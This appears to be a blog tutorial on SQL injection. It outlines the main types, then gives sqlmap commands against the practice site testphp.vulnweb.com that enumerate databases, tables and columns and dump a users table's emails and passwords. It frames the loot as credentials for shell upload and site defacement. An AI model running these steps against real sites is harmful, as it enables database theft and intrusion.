Header Ads



DISCLAIMER: This tutorial is purely for educational purpose Hackempire is not responsible for any blackhat act of any subscriber.With that said lets start the tut.

Sql injection: SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS).

Types of Sql injection.

1-Union-Based SQL Injection
It is the most popular type of SQL injection. This type of attack uses the UNION statement, which is the integration of two select statements, to obtain data from the database.

2-Error-Based SQL Injection
An error-based SQL injection is the simplest type; but, the only difficulty with this method is that it runs only with MS-SQL Server. In this attack, we cause an application to show an error to extract the database. Normally, you ask a question to the database, and it responds with an error including the data you asked for.

3-Blind SQL Injection
The blind SQL injection is the hardest type. In this attack, no error messages are received from the database; hence, we extract the data by asking questions to the database. The blind SQL injection is further divided into two kinds:
a. Boolean-based SQL injection
b. Time-based SQL injection
The above techniques can be used to obtain the data in the database by either asking a question or inducing a time delay.

in this tut we perform sql injection with sqlmap a tool in kali linux. lets start..
commands are enclosed in sqaure bracket []

Boot into your Kali linux machine. Start a terminal, and type -

[ sqlmap -h ]

It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 ]

So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -

[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs ]

 So lets say there are two databases  acuart and information_schema.

we get tables of a particular database.So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-

[  sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables ]

This should list all available tables in the particular database.

Now we we get columns which usually contain the data of our interest, this data could be login credential,credit card info,and most important admin login used for shell upload and site defacement.

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now.
The final command must be something like-

[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns ]

This should list all available columns in the particular table. Now the rest is to dump the sensitive data from the database.
Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.

[  sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump  ]

SO that's it.

Share my channel to help growing

No comments

Theme images by friztin. Powered by Blogger.